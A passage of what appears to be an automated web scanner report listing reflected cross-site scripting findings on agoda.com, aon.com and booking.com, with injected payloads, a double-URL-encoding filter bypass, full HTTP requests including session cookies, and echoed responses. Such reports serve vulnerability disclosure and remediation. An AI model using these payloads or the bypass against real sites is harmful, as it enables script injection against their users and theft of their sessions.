The value of the conversionLabel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a299"onerror%3d"alert(1)"d0370ac32b was submitted in the conversionLabel parameter. This input was echoed as 5a299"onerror="alert(1)"d0370ac32b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306&conversionLabel=M6MLCJbtiQIQsuTm1QM5a299"onerror%3d"alert(1)"d0370ac32b&_=1317602266727 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:40:34 GMT
Content-Length: 363
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate


<html xmlns="http://www.w3.org/1999/xhtml">
<head></head>
<body>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/?label=M6MLCJbtiQIQsuTm1QM5a299"onerror="alert(1)"d0370ac32b&guid=ON&script=0" />
...[SNIP]...
4.159. http://www.aon.com/site/search.jsp [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43d71%2522%253balert%25281%2529%252f%252fe60ed69120c was submitted in the q parameter. This input was echoed as 43d71";alert(1)//e60ed69120c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the q request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq43d71%2522%253balert%25281%2529%252f%252fe60ed69120c&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:03:03 GMT
Content-Length: 83645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.prop5="null:xss txt css img help faq43d71";alert(1)//e60ed69120c";
s.prop6="zero";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
4.160. http://www.aon.com/site/search.jsp [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 56e10%253cscript%253ealert%25281%2529%253c%252fscript%253e071d053f505 was submitted in the q parameter. This input was echoed as 56e10<script>alert(1)</script>071d053f505 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the q request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq56e10%253cscript%253ealert%25281%2529%253c%252fscript%253e071d053f505&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:03:06 GMT
Content-Length: 83697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<h2 class="searchpage">No Results Found results found for "xss txt css img help faq56e10<script>alert(1)</script>071d053f505"</h2>
...[SNIP]...
4.161. http://www.aon.com/site/search.jsp [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78b9cfe1f84 was submitted in the q parameter. This input was echoed as 15a53"><script>alert(1)</script>78b9cfe1f84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the q request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq15a53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78b9cfe1f84&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:03:00 GMT
Content-Length: 83705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<input type="hidden" name="q" value="xss txt css img help faq15a53"><script>alert(1)</script>78b9cfe1f84">
...[SNIP]...
4.162. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6709"><script>alert(1)</script>e4671514908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotelb6709"><script>alert(1)</script>e4671514908/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:46 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55636
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotelb6709"><script>alert(1)</script>e4671514908/us/c-boston-massachusettes.html" />
...[SNIP]...
4.163. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a55ac'%3balert(1)//1b974513244 was submitted in the REST URL parameter 1. This input was echoed as a55ac';alert(1)//1b974513244 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotela55ac'%3balert(1)//1b974513244/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:49 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55552
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ooking.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotela55ac';alert(1)//1b974513244/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';
...[SNIP]...
4.164. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb14a'%3balert(1)//0bc95a6ed04 was submitted in the REST URL parameter 2. This input was echoed as eb14a';alert(1)//0bc95a6ed04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/useb14a'%3balert(1)//0bc95a6ed04/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:55 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55537
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ing.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/useb14a';alert(1)//0bc95a6ed04/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';



...[SNIP]...
4.165. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6994"><script>alert(1)</script>e9338c63c3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/usc6994"><script>alert(1)</script>e9338c63c3f/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
